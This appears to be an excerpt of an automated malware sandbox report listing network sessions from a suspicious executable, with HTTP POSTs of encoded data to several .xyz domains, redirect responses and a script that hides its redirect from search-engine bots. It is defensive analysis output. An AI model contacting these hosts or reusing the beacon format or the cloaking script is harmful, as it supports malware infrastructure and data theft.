                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              65192.168.11.304995913.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:34.816750050 CEST489OUTGET /s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:35.349067926 CEST495INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              66192.168.11.30499603.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:40.482191086 CEST788OUTPOST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 54 43 77 67 2b 6c 31 4a 52 35 6f 62 56 6b 67 70 46 74 38 38 71 5a 6e 69 79 4a 6f 4b 38 69 36 49 6b 2b 31 6f 56 2f 5a 54 61 79 6c 61 59 36 76 4f 56 75 41 44 76 74 45 6c 6e 75 52 56 31 52 4c 67 73 74 65 73 6a 36 61 6b 59 4b 6a 56 46 55 66 35 67 78 44 51 6b 35 46 34 5a 44 58 4e 71 4a 33 69 5a 68 63 70 51 77 30 44 2f 6c 4b 74 61 2b 64 74 76 73 5a 68 4a 56 70 31 32 34 67 4e 2f 4b 50 43 6b 62 42 71 38 30 6d 53 76 4d 56 56 66 4d 50 4c 62 53 52 5a 32 55 48 54 6b 74 6f 43 61 2b 42 4d 64 4d 71 5a 66 50 75 52 48 4e 73 52 43 31 37 58 71 70 49 49 6b 38 65 68 77 5a 2b 30 4e 45 58 79 58 77 3d 3d
                                              Data Ascii: 7LY=TCwg+l1JR5obVkgpFt88qZniyJoK8i6Ik+1oV/ZTaylaY6vOVuADvtElnuRV1RLgstesj6akYKjVFUf5gxDQk5F4ZDXNqJ3iZhcpQw0D/lKta+dtvsZhJVp124gN/KPCkbBq80mSvMVVfMPLbSRZ2UHTktoCa+BMdMqZfPuRHNsRC17XqpIIk8ehwZ+0NEXyXw==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              67192.168.11.30499613.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:43.118777037 CEST808OUTPOST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 54 43 77 67 2b 6c 31 4a 52 35 6f 62 48 58 6f 70 45 4d 38 38 74 35 6e 6a 35 70 6f 4b 70 53 36 4d 6b 2b 78 6f 56 36 30 65 61 41 42 61 5a 59 6e 4f 55 73 6f 44 6f 74 45 6c 73 4f 52 51 6f 42 4c 6e 73 74 54 50 6a 37 6d 6b 59 4c 44 56 46 52 37 35 67 6a 72 54 69 70 46 2b 54 54 58 4c 31 5a 33 69 5a 68 63 70 51 77 67 6c 2f 6c 53 74 61 4f 4e 74 39 5a 31 69 45 31 70 32 78 34 67 4e 6f 61 50 47 6b 62 42 59 38 31 36 38 76 4a 5a 56 66 4f 58 4c 62 6a 52 57 74 6b 48 56 67 74 6f 52 54 74 52 4a 63 65 47 4e 54 39 2b 6b 4f 75 38 33 44 69 4b 4e 33 71 38 4b 33 63 69 4d 73 59 54 63 50 47 57 70 4b 35 44 6c 4a 4c 72 39 58 7a 45 7a 47 2b 32 67 41 6b 64 46 54 4a 51 3d
                                              Data Ascii: 7LY=TCwg+l1JR5obHXopEM88t5nj5poKpS6Mk+xoV60eaABaZYnOUsoDotElsORQoBLnstTPj7mkYLDVFR75gjrTipF+TTXL1Z3iZhcpQwgl/lStaONt9Z1iE1p2x4gNoaPGkbBY8168vJZVfOXLbjRWtkHVgtoRTtRJceGNT9+kOu83DiKN3q8K3ciMsYTcPGWpK5DlJLr9XzEzG+2gAkdFTJQ=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              68192.168.11.30499623.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:45.760525942 CEST2578OUTPOST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 54 43 77 67 2b 6c 31 4a 52 35 6f 62 48 58 6f 70 45 4d 38 38 74 35 6e 6a 35 70 6f 4b 70 53 36 4d 6b 2b 78 6f 56 36 30 65 61 41 4a 61 59 74 7a 4f 57 4e 6f 44 70 74 45 6c 76 4f 52 52 6f 42 4c 36 73 75 6a 54 6a 37 71 30 59 4f 48 56 45 33 6e 35 78 6e 2f 54 72 70 46 2b 64 44 58 4b 71 4a 32 67 5a 69 6b 74 51 77 77 6c 2f 6c 53 74 61 4c 42 74 2b 4d 5a 69 47 31 70 31 32 34 67 42 2f 4b 50 75 6b 62 5a 49 38 30 50 4a 76 4d 74 56 65 2f 48 4c 62 78 35 57 74 6b 48 56 6c 74 6f 53 54 74 63 75 63 65 65 5a 54 38 32 72 50 64 77 33 42 54 6e 6d 69 6f 70 56 6a 2b 36 30 68 73 62 6b 4d 48 71 6f 4c 5a 6a 37 45 59 6e 6a 52 48 46 64 4e 59 2f 2f 46 6d 78 41 46 65 55 47 67 55 65 38 59 78 32 56 6e 6c 39 69 52 68 70 39 4f 76 45 2b 32 63 51 7a 63 41 34 4c 48 2b 43 38 4e 37 39 57 5a 4e 43 74 54 70 6b 71 62 4f 68 45 39 7a 38 5a 63 47 62 39 58 59 7a 75 7a 5a 42 7a 55 4f 7a 53 30 66 61 33 48 4d 7a 61 76 52 4a 73 55 30 6e 6d 64 56 73 39 6d 74 66 69 44 56 7a 71 44 31 37 43 37 33 41 50 41 62 42 56 51 42 74 6e 6e 6f 72 61 51 66 [TRUNCATED]
                                              Data Ascii: 7LY=TCwg+l1JR5obHXopEM88t5nj5poKpS6Mk+xoV60eaAJaYtzOWNoDptElvORRoBL6sujTj7q0YOHVE3n5xn/TrpF+dDXKqJ2gZiktQwwl/lStaLBt+MZiG1p124gB/KPukbZI80PJvMtVe/HLbx5WtkHVltoSTtcuceeZT82rPdw3BTnmiopVj+60hsbkMHqoLZj7EYnjRHFdNY//FmxAFeUGgUe8Yx2Vnl9iRhp9OvE+2cQzcA4LH+C8N79WZNCtTpkqbOhE9z8ZcGb9XYzuzZBzUOzS0fa3HMzavRJsU0nmdVs9mtfiDVzqD17C73APAbBVQBtnnoraQfyeDwUmo76SrKqtdRL2mBH0LoIgkM7I+cyuR8B4jEGOc6L/p23E0O08TQxqKrg3E+SVgOjEq5Ifw9FatnbfxJsCczonmaqQkcQKQv1gxNvrmsoqOsGzz5j4X6av63YVwwaY3C4bK+ZBQux+Vn1j6e3t+VDeGQ8UyKrNy4x/EGp4QX12G7GnHJ5mvL7pkCUgTYS9c9pJuY1FCvO8yE9pVbGvQ+91JsCbYbBGmDGWVRP8PoagvMNpnX9sI94uFcRs240ck11B6oqQ2EudICBbf4Br/8X64lIrvp38GyZWqzp29EXTp4DPcog3G+G/2lc7GeAggysLS0gFHmt5P4dYKaM1i3E+7uafZgcr1k6S+q7qP37qSTFhAEDnSxVXIbsNxHxVk8wqyQTH2M6TV4i1Y9hSgjS5L2IaJ1jeAP7bt5qMSWxbKDyDUBEg7N3m6Nxrj6NC+Kb+TKXSGI7uO0por3Tldjpg2wqbo4it0FLxTHtNwC458D40felkjYHuJFt1nPRKJ4fu7IMzVzxKKiyQzjbLgqruqtGZgvkuJeNsDSP0IbCxu381x/xmlcUl0ALknVYUMze594XUR7WuxzxH5aRaCPuJAr/nMp1KSsq4xYxWxLh03uZ57/VrhEpkgrupyfgmLBm/XmgBEISqPPMHRO0+xCqBIxyDtNV8 [TRUNCATED]
                                              Sep 24, 2024 11:30:45.760596037 CEST1347OUTData Raw: 6c 33 63 39 32 73 46 54 39 38 35 6b 56 76 36 62 65 42 56 35 39 65 52 35 35 30 4a 33 48 50 6d 77 79 6d 68 46 74 38 62 46 4b 2b 70 4d 44 5a 79 59 32 4b 72 32 61 6d 54 6e 44 79 47 56 64 57 47 45 79 75 53 62 79 49 66 59 6d 36 64 4d 38 2b 4f 54 6e 53
                                              Data Ascii: l3c92sFT985kVv6beBV59eR550J3HPmwymhFt8bFK+pMDZyY2Kr2amTnDyGVdWGEyuSbyIfYm6dM8+OTnSLpHSrU7lWOqEgGLR3E7383LUPJJ0cisRbKh20F2U/7x7FtXwiStWX5ocO7IEZ1ov8kHwcHiKBWe3Su5/e+vQb8Pch7uggK3NK3gPdvdb9t+RoyjYbRKxaoYogU8XJrQ3GZXpc9/GMJ2QNQgN8rcQC4825CQqCifkk


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              69192.168.11.30499633.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:48.397658110 CEST501OUTGET /l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s= HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:48.502226114 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:30:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 7a 65 3d 43 30 6b 6c 56 54 26 37 4c 59 3d 65 41 59 41 39 53 31 37 45 72 6b 4b 4c 79 6f 6d 4b 76 46 68 6e 5a 65 35 6f 62 6b 57 70 69 48 4a 78 71 74 51 53 4c 77 51 52 77 49 4a 61 72 33 46 65 5a 38 5a 68 50 38 69 72 2f 39 56 70 68 66 4c 72 2b 50 35 37 35 71 59 45 62 48 56 42 78 7a 42 67 78 6e 4c 73 64 56 31 42 7a 6a 45 36 73 76 44 52 6a 70 6d 4a 42 74 39 6b 79 57 75 43 6f 4a 73 32 4b 4d 6f 49 31 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              70192.168.11.3049964172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:01.855554104 CEST770OUTPOST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 36 64 76 56 56 58 2f 31 38 65 35 4c 4c 32 58 50 53 38 49 58 68 4e 64 6b 6e 2b 4c 57 31 63 37 62 78 42 2b 2f 63 39 49 68 56 2f 6b 34 34 37 37 6c 65 33 6d 47 56 76 42 46 39 6c 34 6a 78 72 4a 66 50 41 67 39 4d 72 74 51 4a 4f 67 70 75 52 71 6e 73 34 49 5a 51 77 4c 32 46 34 35 4c 54 39 73 57 33 67 51 5a 4a 78 7a 48 55 36 53 76 34 71 2f 6b 35 76 4e 56 4d 67 4e 4d 32 52 78 6b 63 70 43 52 75 6f 71 55 44 67 63 45 55 2b 71 2b 35 67 6f 34 47 32 6c 56 36 37 69 33 72 43 67 58 76 6a 33 79 31 58 36 41 63 70 7a 6a 64 77 70 5a 31 69 78 6f 2b 45 49 67 51 35 69 51 34 32 58 54 35 63 34 53 4e 77 3d 3d
                                              Data Ascii: 7LY=6dvVVX/18e5LL2XPS8IXhNdkn+LW1c7bxB+/c9IhV/k4477le3mGVvBF9l4jxrJfPAg9MrtQJOgpuRqns4IZQwL2F45LT9sW3gQZJxzHU6Sv4q/k5vNVMgNM2RxkcpCRuoqUDgcEU+q+5go4G2lV67i3rCgXvj3y1X6AcpzjdwpZ1ixo+EIgQ5iQ42XT5c4SNw==
                                              Sep 24, 2024 11:31:02.009377956 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 499
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:01 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              71192.168.11.3049965172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:04.541949034 CEST790OUTPOST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 36 64 76 56 56 58 2f 31 38 65 35 4c 4c 58 6e 50 43 72 30 58 6e 74 64 72 2b 2b 4c 57 38 38 37 66 78 42 69 2f 63 34 78 73 55 4e 41 34 2f 62 4c 6c 64 79 53 47 59 50 42 46 6c 56 34 69 38 4c 49 54 50 41 6b 31 4d 70 4a 51 4a 4b 41 70 75 55 4f 6e 76 4c 51 57 52 67 4c 4f 4f 59 35 4e 63 64 73 57 33 67 51 5a 4a 78 32 6f 55 36 4b 76 37 62 76 6b 35 4e 6c 57 46 41 4e 4c 2f 78 78 6b 57 4a 43 56 75 6f 71 32 44 68 41 75 55 39 53 2b 35 68 34 34 49 44 46 57 76 72 69 4c 6c 69 67 5a 75 77 6d 35 32 6b 65 79 56 62 6d 35 54 68 39 53 35 56 41 79 6a 48 38 69 44 5a 65 39 6b 33 36 37 37 65 35 4a 51 32 6e 41 66 73 6d 7a 49 63 2b 73 5a 54 66 69 4a 4b 77 2b 32 4f 55 3d
                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNA4/bLldySGYPBFlV4i8LITPAk1MpJQJKApuUOnvLQWRgLOOY5NcdsW3gQZJx2oU6Kv7bvk5NlWFANL/xxkWJCVuoq2DhAuU9S+5h44IDFWvriLligZuwm52keyVbm5Th9S5VAyjH8iDZe9k3677e5JQ2nAfsmzIc+sZTfiJKw+2OU=
                                              Sep 24, 2024 11:31:04.704819918 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 498
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:04 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              72192.168.11.3049966172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:07.230856895 CEST1289OUTPOST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 36 64 76 56 56 58 2f 31 38 65 35 4c 4c 58 6e 50 43 72 30 58 6e 74 64 72 2b 2b 4c 57 38 38 37 66 78 42 69 2f 63 34 78 73 55 4e 49 34 2f 71 72 6c 66 56 2b 47 58 76 42 46 6f 31 34 5a 38 4c 4a 4a 50 41 63 78 4d 70 31 71 4a 4d 4d 70 76 79 53 6e 71 36 51 57 66 67 4c 4f 42 34 35 49 54 39 74 4f 33 67 41 64 4a 78 6d 6f 55 36 4b 76 37 59 6e 6b 37 66 4e 57 44 41 4e 4d 32 52 78 6f 63 70 43 39 75 72 61 63 44 68 45 55 55 2b 79 2b 34 53 77 34 49 77 74 57 76 72 69 4c 73 43 67 4a 75 77 71 38 32 6b 47 75 56 65 44 4d 53 51 4a 53 70 78 73 6f 32 6a 4d 44 51 4a 53 66 68 45 32 36 73 73 35 33 66 6e 58 44 53 4d 2b 51 48 50 75 63 52 31 62 63 64 61 4d 2f 72 4b 56 42 4f 62 32 79 4e 4e 32 46 72 6e 6c 59 64 7a 2b 41 4c 47 50 51 54 56 4e 33 42 46 68 33 2f 50 32 38 30 2f 67 4c 34 6d 35 4e 44 4a 67 73 36 44 61 44 7a 57 4c 56 70 6d 6b 79 58 55 73 54 53 41 56 79 72 2b 61 48 63 4d 48 6d 64 73 43 4c 66 72 75 72 53 6a 6e 64 4c 6f 50 38 75 50 4f 75 50 6b 59 7a 32 4c 79 4e 56 69 79 5a 43 30 7a 45 54 2b 4c 6e 75 4c 31 30 46 32 [TRUNCATED]
